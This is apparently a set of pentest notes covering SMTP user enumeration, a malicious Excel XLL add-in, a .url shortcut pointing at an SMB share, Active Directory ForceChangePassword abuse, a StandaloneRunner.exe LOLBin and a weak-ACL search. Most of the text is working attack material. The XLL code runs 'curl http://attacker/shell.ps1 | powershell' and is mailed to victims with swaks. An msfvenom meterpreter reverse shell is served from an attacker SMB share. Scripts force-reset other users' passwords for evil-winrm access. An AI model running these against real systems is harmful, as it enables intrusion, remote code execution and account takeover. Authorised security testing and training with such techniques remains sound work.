SMTP enum

A quick way to enumerate an SMTP service is nmap's built-in smtp-commands script: it connects, sends EHLO and HELP, and lists the extensions and commands the server advertises (AUTH methods, STARTTLS, VRFY/EXPN and so on).

> nmap --script smtp-commands.nse --script-args smtp-commands.domain=target -pT:25,465,587 target
PORT    STATE    SERVICE
25/tcp  open     smtp
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
465/tcp filtered smtps
587/tcp filtered submission

Two things to read off this output: VRFY is in the HELP list, so valid mailbox names can be enumerated directly (e.g. smtp-user-enum -M VRFY -U users.txt -t target; EXPN and RCPT TO are the fallbacks when VRFY is disabled or answers 252 for every address), and AUTH LOGIN is offered on port 25 without STARTTLS, so any credentials used there cross the wire base64-encoded rather than encrypted.
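The VRFY enumeration described above, as an added example that is not part of the original notes: one SMTP session, a VRFY per candidate, and the reply code mapped to valid / invalid / inconclusive (252, the answer many hardened servers give for everything, proves nothing). The host "target", the candidate names and the embedded fake server's mailbox table are constructed so the script runs offline; point enumerate_users at a real host and port to use it for real.

```python
"""VRFY-based SMTP user enumeration, with an embedded fake server so it runs offline.

Added example, not part of the original notes. "target", the candidate names and
the fake server's mailbox table (FAKE_MAILBOXES) are constructed for the demo.
"""
import smtplib
import socket
import threading

# Constructed mailbox table for the embedded fake server (stands in for "target").
FAKE_MAILBOXES = {"admin", "postmaster"}


def classify(code):
    """Map a VRFY reply code to what it says about the mailbox.

    250/251 confirm it; 252 means "cannot verify, but will accept mail", and many
    hardened servers answer 252 for every address, so it proves nothing;
    550/551/553 deny it; 500/502 mean VRFY is disabled (fall back to EXPN or
    RCPT TO).
    """
    if code in (250, 251):
        return "valid"
    if code == 252:
        return "inconclusive"
    if code in (550, 551, 553):
        return "invalid"
    if code in (500, 502):
        return "vrfy-disabled"
    return "unknown"


def enumerate_users(host, port, candidates, domain="target"):
    """VRFY each candidate in one session and return {name: status}.

    One session is quieter than reconnecting per name; servers that drop the
    connection after too many unknown recipients surface as a socket error.
    """
    results = {}
    # local_hostname avoids smtplib's socket.getfqdn() lookup (slow without DNS)
    with smtplib.SMTP(host, port, local_hostname="scanner.example", timeout=10) as smtp:
        smtp.ehlo()
        for name in candidates:
            code, _msg = smtp.verify(f"{name}@{domain}")
            results[name] = classify(code)
            if results[name] == "vrfy-disabled":
                break
    return results


def _fake_smtp_server(listener):
    """Constructed minimal SMTP responder: serves one client, then exits."""
    conn, _ = listener.accept()
    rfile = conn.makefile("rb")

    def reply(*lines):
        conn.sendall("".join(line + "\r\n" for line in lines).encode())

    reply("220 mail.target ESMTP")
    while True:
        raw = rfile.readline()
        if not raw:
            break
        verb, _, arg = raw.decode("ascii", "replace").strip().partition(" ")
        verb = verb.upper()
        if verb == "EHLO":
            reply("250-mail.target", "250-VRFY", "250 HELP")
        elif verb == "VRFY":
            local = arg.strip("<> ").split("@")[0]
            if local in FAKE_MAILBOXES:
                reply(f"250 {local} <{local}@target>")
            else:
                reply("550 5.1.1 User unknown")
        elif verb == "QUIT":
            reply("221 Bye")
            break
        else:
            reply("502 5.5.1 Command not implemented")
    conn.close()
    listener.close()


def demo():
    """Run the enumeration against the fake server on a loopback port."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    server = threading.Thread(target=_fake_smtp_server, args=(listener,), daemon=True)
    server.start()
    results = enumerate_users("127.0.0.1", port, ["admin", "guest", "postmaster", "bob"])
    server.join(timeout=5)
    return results


if __name__ == "__main__":
    for user, status in demo().items():
        print(f"{user:<12} {status}")
```

Against a real target, watch for a server that answers 252 to every name (switch to RCPT TO after MAIL FROM, which most servers still evaluate per recipient) and for rate limiting, which shows up as the connection being dropped mid-list.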

XLL RCE

XLLs are DLLs with a small export interface that Microsoft Excel loads as add-ins; to the untrained eye they look a lot like ordinary Excel documents. They are an attractive option for user-driven attacks (UDA) because they are executed by Microsoft Excel, software found on almost every client network; as an additional bonus, because the trusted Excel process is what loads them, the payload usually bypasses application whitelisting rules that only cover executables (AppLocker DLL rules, where enforced, do cover XLLs, so check the policy). XLLs can be written in C, C++ or C#, which provides a great deal more flexibility and power (and sanity) than VBA macros and further makes them a desirable choice. One caveat for delivery: since 2023 Excel blocks XLL add-ins that carry the Mark of the Web (downloaded from the internet or saved from an e-mail attachment), so test the delivery path against the target's Office build before relying on it.

To set up the test environment, follow the steps below

  • Create a Visual C++ DLL project and point it at the Excel 2013 XLL SDK: add the INCLUDE directory to the include path and link XLCALL32.LIB (the LIB/x64 copy for 64-bit Office, the 32-bit one otherwise; the XLL must match Excel's bitness or it will not load)
2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/
2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB
  • Update the code in HelloWorldXll.cpp. xlAutoOpen is the entry point Excel calls when it loads the add-in, and it must be exported (__declspec(dllexport) as below, or a .def file, which is also the safer choice on 32-bit builds where __stdcall names get decorated), otherwise Excel never calls it
#include "stdafx.h"
#include <stdlib.h>   // system()

// Called by Excel as soon as the XLL is loaded. The command pulls the
// PowerShell stager from the attacker web server and pipes it into a hidden
// PowerShell (-f - reads the script from stdin). system() itself still
// flashes a console window; a CreateProcess with CREATE_NO_WINDOW is quieter.
extern "C" __declspec(dllexport) short __stdcall xlAutoOpen()
{
	system("curl http://attacker/shell.ps1 | powershell -nop -W hidden -noni -ep bypass -f -");
	return 1;
}
  • Build the project and get the .xll file
  • Host shell.ps1 on the attacker web server and start the listener it connects back to; a PowerShell reverse shell is in the shell notes: https://meowmeowattack.github.io/notes/4-shell/
  • Send the .xll file to the target by e-mail. If the target runs an SMTP server that accepts mail for its own domain without authentication, swaks can deliver the attachment directly:
> swaks --to test1@target --from test2@target --header "Subject: test" --body "check" --attach @test.xll --server target --port 25

Shortcut URL Injection

  • An Internet Shortcut (.url) file is a plain INI file. Pointing its URL at a UNC path makes Explorer fetch and run the executable from the attacker's SMB share when the user opens the shortcut (expect Windows to show a security prompt before running an executable from a network share, which the user has to click through). It can be created like below
$url = "file:////attacker/share/shell.exe"   # resolves to \\attacker\share\shell.exe
$shortcutPath = "C:\path\shortcut.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
  • You can generate a reverse shell using msfvenom (named shell.exe so it matches the URL above) and serve it using a simple SMB server; -smb2support is required for current Windows clients, which no longer speak SMB1. Start a matching multi/handler before the user clicks
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=5555 -f exe > ./path/shell.exe
> impacket-smbserver -smb2support share ./path
> msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST attacker; set LPORT 5555; run"

ForceChangePassword

On Windows (especially in an AD environment), a user may be able to reset another user's password without knowing the current one, through an ACL on the target user object that is granted to the attacker's user (or to a group they are in). Specifically, check for the following rights on the target account:

  • GenericAll
  • AllExtendedRights
  • User-Force-Change-Password (the extended right BloodHound draws as the ForceChangePassword edge)

WriteDacl or WriteOwner on the account can be turned into any of these by rewriting its ACL first. Finding such rights is easiest by collecting the domain with SharpHound (https://github.com/BloodHoundAD/SharpHound) and analysing the data in BloodHound (https://github.com/BloodHoundAD/BloodHound) run locally

> SharpHound.exe -c All --zipfilename output.zip

# on kali, setup bloodhound (the GUI plus its neo4j backend)
> apt install bloodhound neo4j
# bloodhound-python: a collector that runs from Linux with domain credentials, for when SharpHound cannot be run on a domain-joined host
> python3 -m pip install bloodhound

# run; neo4j's default credentials are neo4j:neo4j (it forces a change on first login), then import output.zip in the GUI
> neo4j console
> bloodhound --no-sandbox

If any of the above rights are found, reset the target user's password with PowerView: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 (this is noisy and disruptive: the victim's current password stops working immediately, so make sure the rules of engagement allow it)

Invoke-WebRequest -URI http://attacker/PowerView.ps1 -OutFile PowerView.ps1
Import-Module .\PowerView.ps1
$pass = ConvertTo-SecureString 'password123!@#' -AsPlainText -Force
# runs in the current user's context; add -Credential to use another account that holds the right
Set-DomainUserPassword -Identity victim -AccountPassword $pass -Verbose

Now you can log in as the victim user, provided the account has WinRM access on the target (local administrator or a member of Remote Management Users):

> evil-winrm -i target -u victim -p 'password123!@#'
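The same reset done from a Linux host, as an added example that is not part of the original notes or of PowerView: Set-DomainUserPassword is, underneath, an LDAP replace of the target's unicodePwd attribute, which is exactly what the User-Force-Change-Password right permits, and the attribute has a quirk worth knowing (the value must be the new password in double quotes, encoded UTF-16-LE, sent over LDAPS). The DC name, DN and credentials are placeholders; the third-party ldap3 package is assumed for the connection and imported lazily so the encoding helper works without it.

```python
"""Reset another AD user's password over LDAPS from a Linux host.

Added example, not part of the original notes or of PowerView. It performs the
same operation as Set-DomainUserPassword: an LDAP replace of the target's
unicodePwd attribute, which is what the User-Force-Change-Password right allows.
Host, DN and credentials below are placeholders. Needs the third-party ldap3
package (pip install ldap3); it is imported lazily so the encoding helper works
without it.
"""


def encode_unicode_pwd(password):
    """AD accepts unicodePwd only as the password wrapped in double quotes and
    encoded UTF-16-LE; anything else fails with unwillingToPerform even when
    the ACL is right."""
    return f'"{password}"'.encode("utf-16-le")


def force_change_password(dc_host, bind_user, bind_password, target_dn, new_password):
    """Replace target_dn's unicodePwd as bind_user (the account holding the right,
    given as DOMAIN\\user for NTLM). Must be LDAPS (636) or an LDAP session with
    signing and sealing: the DC refuses password writes over a plain bind.
    Returns True on success, raises with the DC's diagnostic otherwise."""
    import ldap3  # assumption: ldap3 is installed

    server = ldap3.Server(dc_host, port=636, use_ssl=True, get_info=ldap3.NONE)
    conn = ldap3.Connection(server, user=bind_user, password=bind_password,
                            authentication=ldap3.NTLM, auto_bind=True)
    try:
        ok = conn.modify(target_dn, {"unicodePwd": [(ldap3.MODIFY_REPLACE,
                                                    [encode_unicode_pwd(new_password)])]})
        if not ok:
            # e.g. insufficientAccessRights (no ForceChangePassword on the target)
            # or unwillingToPerform (password policy, or a plaintext session)
            raise RuntimeError(f"password reset failed: {conn.result}")
        return ok
    finally:
        conn.unbind()


if __name__ == "__main__":
    # Placeholder values; the DN comes from BloodHound's node details or an LDAP search.
    force_change_password("dc01.target", "TARGET\\attacker", "Winter2024!",
                          "CN=victim,CN=Users,DC=target,DC=local", "password123!@#")
```

Without ldap3, Samba's net rpc password victim 'password123!@#' -U 'TARGET/attacker%Winter2024!' -S dc01.target does the same reset through SAMR, and ldap3 itself also wraps this write as conn.extend.microsoft.modify_password(dn, new_password).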

StandaloneRunner.exe

StandaloneRunner.exe is a test-harness binary shipped with the Windows Driver Kit (WDK) under Windows Kits\10\Testing\StandaloneTesting. It reads the test to run from files in its working directory, including a command to execute, which makes it usable as a LOLBin: a Microsoft-shipped executable that runs an arbitrary command on your behalf. The binary can often be found at the following paths (one per architecture)

C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\arm\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\arm64\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x86\standalonerunner.exe
# copy standalonerunner.exe and standalonexml.dll to a working directory
copy "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe" standalonerunner.exe
copy "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonexml.dll" standalonexml.dll

# Create a file named reboot.rsf in the same directory: first line is the test directory name, second line is True
echo testdir > reboot.rsf
echo True >> reboot.rsf

# Create the required folder structure
mkdir testdir
mkdir testdir\working

# create a rsf.rsf file in the working directory
echo 1 > testdir\working\rsf.rsf

# Create a command.txt file in the current directory and fill it with the command to execute
echo "c:\temp\shell.exe" > command.txt

# run the binary from this directory; it picks up reboot.rsf and executes the contents of command.txt
standalonerunner.exe

Windows folder/file enum by keyword

To find files and folders whose ACL mentions a given principal or right, dump the ACLs recursively with icacls and filter the output. "C:\*." matches the top-level entries without an extension (in practice the directories), /T recurses into them and /C keeps going past access-denied errors; 2>$null is PowerShell syntax, use 2>nul from cmd.exe. Typical keywords are the principals a low-privileged user belongs to (Everyone, BUILTIN\Users, Authenticated Users) combined with the write-capable rights (F), (M), (W)

> ICACLS "C:\*." /T /C 2>$null | findstr "keyword"

findstr treats a space-separated string as a list of alternatives, so findstr "Everyone Users" matches either; chain a second findstr /i "(F) (M) (W)" to keep only the writable entries.
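A parser for the icacls output above, as an added example that is not part of the original notes: it reconstructs (path, principal, rights) from the recursive dump, where only the first ACE of each object sits on the path's line and the rest are indented continuation lines, and then flags the entries a low-privileged principal can write to, skipping deny ACEs, which a plain findstr on "(F)" does not. SAMPLE_OUTPUT is a constructed transcript in icacls' layout, not output from any real host; run_icacls runs the real command on Windows.

```python
"""Parse recursive icacls output and flag objects writable by low-privileged principals.

Added example, not from the original notes. SAMPLE_OUTPUT is a constructed
icacls /T transcript in the real layout: the first ACE of each object follows
its path on the same line, further ACEs are indented continuation lines, and
access-denied errors plus the summary trailer are mixed in.
"""
import re
import subprocess

# Principals every local or domain user effectively holds; add the target's
# broad groups (e.g. TARGET\Domain Users) once you know them.
LOW_PRIV = {"Everyone", "BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users",
            "NT AUTHORITY\\INTERACTIVE"}
# Simple and granular rights that let the holder change or replace content.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}
# Well-known principals containing spaces: needed to split path from principal
# on an object's first line, since paths contain spaces too.
MULTIWORD_AUTHORITIES = ("NT AUTHORITY\\", "NT SERVICE\\", "APPLICATION PACKAGE AUTHORITY\\")
STANDALONE_NAMES = ("Everyone", "CREATOR OWNER", "CREATOR GROUP")

ACE_RE = re.compile(r"^(?P<head>.*?):(?P<rights>(?:\([^)]*\))+)\s*$")
DOMAIN_NAME_RE = re.compile(r"^[^\s\\]+\\[^\\]+$")   # DOMAIN\name, name may have spaces
SID_RE = re.compile(r"^S-\d+(?:-\d+)+$")              # unresolved SID


def _split_head(head):
    """Split 'C:\\Program Files\\App BUILTIN\\Users' into (path, principal).
    Indented continuation lines carry no path and yield (None, principal)."""
    if head[:1].isspace():
        return None, head.strip()
    spaces = [i for i, ch in enumerate(head) if ch == " "]
    if not spaces:
        return None, head
    last = head[spaces[-1] + 1:]
    # 1) longest suffix that is a well-known principal with spaces in it
    for i in spaces:
        cand = head[i + 1:]
        if cand in STANDALONE_NAMES or cand.startswith(MULTIWORD_AUTHORITIES):
            return head[:i], cand
    # 2) unresolved SID: always the last token
    if SID_RE.match(last):
        return head[:spaces[-1]], last
    # 3) shortest suffix shaped like DOMAIN\name, checked right to left so a
    #    path component such as 'Files\Acme Agent' is never mistaken for one
    for i in reversed(spaces):
        cand = head[i + 1:]
        if DOMAIN_NAME_RE.match(cand):
            return head[:i], cand
    return head[:spaces[-1]], last


def parse_icacls(text):
    """Return [(path, principal, flags)] for every ACE; flags is the set of
    parenthesised tokens, e.g. {'OI', 'CI', 'M'} or {'DENY', 'W'}."""
    entries, current_path = [], None
    for line in text.splitlines():
        m = ACE_RE.match(line)
        if not m:        # 'Access is denied.' lines, the summary trailer, blanks
            continue
        path, principal = _split_head(m.group("head"))
        if path is not None:
            current_path = path
        flags = set(re.findall(r"\(([^)]*)\)", m.group("rights")))
        entries.append((current_path, principal, flags))
    return entries


def find_weak(entries, principals=LOW_PRIV, rights=WRITE_RIGHTS):
    """Keep allow ACEs where a low-privileged principal holds a write-capable
    right; icacls marks deny ACEs with (DENY) and those are skipped."""
    return [(path, principal, sorted(flags & rights))
            for path, principal, flags in entries
            if principal in principals and "DENY" not in flags and flags & rights]


def run_icacls(root=r"C:\*."):
    """Run the same recursive dump as the notes (Windows only) and return its text."""
    proc = subprocess.run(["icacls", root, "/T", "/C"], capture_output=True,
                          text=True, errors="replace")
    return proc.stdout


# Constructed sample in icacls' layout (not real output from any host).
SAMPLE_OUTPUT = r"""C:\Program Files\Acme Agent NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                            BUILTIN\Administrators:(OI)(CI)(F)
                            BUILTIN\Users:(OI)(CI)(M)
C:\Program Files\Acme Agent\agent.exe NT AUTHORITY\SYSTEM:(I)(F)
                                      BUILTIN\Users:(I)(RX)
C:\Tools NT AUTHORITY\Authenticated Users:(OI)(CI)(F)
         BUILTIN\Users:(DENY)(W)
C:\Logs TARGET\Domain Users:(OI)(CI)(WD)
C:\Secure: Access is denied.
Successfully processed 4 files; Failed processing 1 files
"""

if __name__ == "__main__":
    for path, principal, rights in find_weak(parse_icacls(SAMPLE_OUTPUT)):
        print(f"{path}  {principal}  {','.join(rights)}")
```

On the sample this reports the Acme Agent install directory (BUILTIN\Users has Modify, so a DLL or the service binary can be replaced) and C:\Tools, while the denied write under C:\Tools and the read-only entry on agent.exe are correctly ignored; the Domain Users entry on C:\Logs only shows up once that group is added to LOW_PRIV.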